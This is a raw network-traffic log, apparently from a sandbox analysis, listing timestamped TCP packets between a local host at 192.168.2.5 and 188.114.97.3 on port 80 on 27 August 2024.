                              Aug 27, 2024 09:48:55.907444000 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907507896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907520056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907529116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907540083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907552004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907563925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907563925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907608032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907635927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.923312902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923331022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923440933 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.923547983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923557997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923573017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923608065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923618078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923629045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923640966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923733950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.923734903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.923734903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.923751116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923764944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923787117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.923903942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923913956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923926115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923938036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923938990 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.923950911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923963070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.923975945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924002886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924019098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924030066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924055099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924216032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924228907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924237967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924251080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924257040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924263000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924274921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924280882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924285889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924299002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924308062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924309969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924323082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924324036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924334049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924348116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924349070 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924374104 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924488068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924499989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924523115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924586058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924597979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924607992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924618006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924629927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924639940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924685001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924732924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924742937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924761057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924771070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924782038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924793959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924803972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924804926 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924817085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924828053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924839973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.924849987 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.924875975 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925057888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925071001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925084114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925096035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925111055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925122023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925132990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925138950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925163031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925172091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925184965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925193071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925205946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925210953 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925216913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925228119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925239086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925246954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925251007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925262928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925276995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925281048 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925303936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925714016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925724983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925734997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925746918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925757885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925766945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925769091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925780058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925787926 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925790071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925801992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925812960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925825119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925836086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925841093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925848961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925860882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.925870895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.925882101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.933207035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.933223009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.933233976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.933253050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.933264017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.933269024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.933274984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.933285952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.933290005 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.933339119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995328903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995358944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995369911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995438099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995452881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995465040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995475054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995565891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995578051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995584011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995584011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995593071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995604992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995616913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995620966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995666981 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995693922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995697021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995706081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995743990 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995763063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995841980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995852947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995862961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995876074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995887995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995896101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995918036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995959044 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.995982885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.995994091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996006012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996016026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996026993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996037960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996049881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996062040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996072054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.996073961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996097088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.996113062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.996174097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.996248960 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.012403011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012448072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012459040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012502909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012518883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012530088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012543917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012598991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.012598991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.012598991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.012681961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012692928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012701988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012712002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012723923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.012731075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012732029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.012742043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012753010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012762070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012773991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012778997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.012785912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.012834072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013004065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013015032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013025999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013055086 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013067007 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013098001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013109922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013118982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013128996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013139963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013150930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013160944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013163090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013180017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013200998 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013274908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013312101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013385057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013395071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013406038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013417959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013428926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013432026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013443947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013453007 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013454914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013464928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013480902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013480902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013489962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013494968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013500929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013513088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013535023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013561964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013724089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013817072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013828039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013839006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013850927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013854027 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013861895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013871908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013878107 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013891935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.013947964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.013991117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014045954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014056921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014065027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014075041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014086008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014096022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014106035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014116049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014126062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014130116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014162064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014178038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014194965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014204025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014214993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014225960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014236927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014236927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014247894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014251947 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014259100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014270067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014280081 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014317036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014575958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014585972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014600039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014622927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014672041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014683962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014694929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014704943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014708042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014719009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014729023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014736891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014741898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.014756918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.014800072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.021421909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021440029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021449089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021523952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.021547079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021558046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021570921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021581888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021595955 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.021600962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.021625996 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.021665096 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084084988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084125042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084142923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084155083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084167004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084177971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084194899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084206104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084235907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084366083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084376097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084378004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084378004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084386110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084398985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084409952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084410906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084420919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084429979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084433079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084469080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084486961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084527969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084538937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084570885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084696054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084707022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084716082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084728003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084738970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084749937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084758997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084760904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084774017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.084779978 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.084800959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.085289955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.085352898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.100837946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.100847006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.100857973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.100908041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.100919962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.100927114 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.100930929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.100941896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.101087093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.101095915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.101106882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.101118088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.101130009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.101140976 CEST8061383188.114.97.3192.168.2.5
